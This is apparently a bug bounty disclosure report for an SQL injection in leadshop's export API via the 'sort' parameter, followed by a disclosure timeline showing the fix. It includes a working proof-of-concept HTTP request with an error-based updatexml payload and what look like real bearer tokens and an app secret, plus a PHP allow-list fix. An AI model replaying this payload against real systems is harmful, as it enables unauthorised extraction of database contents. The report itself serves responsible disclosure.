SQL injection at exportUsers function in qmpaas/leadshop


Reported on

May 26th 2022


SQL injection at exportUsers function via sort query parameter

Proof of Concept

GET /index.php?q=/api/leadmall/statistical&behavior=exportGoods&sort={"updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)--+-":"asd"} HTTP/1.1
Host: demo.leadshop.vip
Cookie: _csrf=fefe3c31fa6dbee72cd8e6a1e3b010398cfeed682f0198b879af18dbd5d5e5c8a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22SQDJuf-G631HB3SFwAjpH8ZW9XfM-nci%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLmxlYWRzaG9wLnZpcCIsImF1ZCI6Imh0dHBzOlwvXC9kZW1vLmxlYWRzaG9wLnZpcCIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyIsImlhdCI6MTY1MzU4MzAxNiwiZXhwIjoxNjU2MTc1MDE2LCJpZCI6MX0.O11reWZxDohDWiW9eqeTK0mvvxVy_xwwM4h7g5lwjXs
Qm-App-Type: undefined
Qm-App-Id: 98c08c25f8136d590c
Qm-App-Secret: 3AYpU16dZ1CY7ejqvrE39B351vanLJVD
Origin: https://demo.leadshop.vip
Referer: https://demo.leadshop.vip/index.php?r=admin%2Findex
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: red
Te: trailers
Connection: close

Poc Image



An attacker can modify the query and retrieve all data in the database.
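
The request above carries the SQL in a key of the `sort` JSON object, which points to those keys being used as ORDER BY column names (an assumption; the handler's code is not shown in this report). The following added example, which is not taken from the report or from leadshop's code, shows an allow-list check for such a parameter; `parseSort`, `SORTABLE_COLUMNS` and the column names are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical allow-list of columns a client may sort by (assumed names).
const SORTABLE_COLUMNS = ['created_time', 'sales', 'price'];

/**
 * Convert the raw `sort` parameter (a JSON object, e.g. {"price":"DESC"})
 * into a column => SORT_ASC|SORT_DESC map. Keys are only ever compared
 * with the allow-list; request text is never copied into the SQL string.
 */
function parseSort(string $rawSort, array $allowed = SORTABLE_COLUMNS): array
{
    $decoded = json_decode($rawSort, true);
    if (!is_array($decoded)) {
        throw new InvalidArgumentException('sort must be a JSON object');
    }

    $directions = ['ASC' => SORT_ASC, 'DESC' => SORT_DESC];
    $orderBy = [];
    foreach ($decoded as $column => $direction) {
        // JSON lists decode to integer keys, so is_string() rejects them too.
        if (!is_string($column) || !in_array($column, $allowed, true)) {
            throw new InvalidArgumentException('unsupported sort column');
        }
        $dir = is_string($direction) ? strtoupper($direction) : '';
        if (!isset($directions[$dir])) {
            throw new InvalidArgumentException('sort direction must be ASC or DESC');
        }
        $orderBy[$column] = $directions[$dir];
    }
    return $orderBy;
}

// Constructed inputs: a legitimate value, then the sort value from the request above.
$samples = [
    '{"created_time":"desc"}',
    '{"updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)--+-":"asd"}',
];
foreach ($samples as $raw) {
    try {
        echo 'accepted: ', json_encode(parseSort($raw)), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

The returned map uses PHP's `SORT_ASC` and `SORT_DESC` constants, so it can be handed to a query builder that takes a column-to-direction array instead of being concatenated into an ORDER BY string.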

We are processing your report and will contact the qmpaas/leadshop team within 24 hours. 2 years ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists 2 years ago
We have contacted a member of the qmpaas/leadshop team and are waiting to hear back 2 years ago
We have sent a follow up to the qmpaas/leadshop team. We will try again in 7 days. 2 years ago
2 years ago


Hi @maintainer,

Can you review my report?

We have sent a second follow up to the qmpaas/leadshop team. We will try again in 10 days. a year ago
a year ago


Hi @admin, any update here?

Jamie Slome
a year ago


No update. Let's wait for the remaining notifications to go out to the maintainer. Once the final notification has been sent, feel free to get in touch again, and I will reach out to the maintainers on your behalf 👍

We have sent a third and final follow up to the qmpaas/leadshop team. This report is now considered stale. a year ago
a year ago


Hi @admin, looks like the maintainer fixed it at https://github.com/qmpaas/leadshop/commit/44dba1c86b7b2cfcd4594a25335f8628b650d37e#diff-2f55bd65e7f3d17890b89a77f76ee040e12d09519ff5668c12ffefc40ecdb2cc

leadshop开源商城 validated this vulnerability a year ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
leadshop开源商城 marked this as fixed in 1.4.10 with commit 44dba1 a year ago
leadshop开源商城 has been awarded the fix bounty
This vulnerability will not receive a CVE
a year ago


@admin can we assign a CVE to this vulnerability?

Jamie Slome
a year ago


We can, as long as the maintainer is happy to assign and publish one for this report.

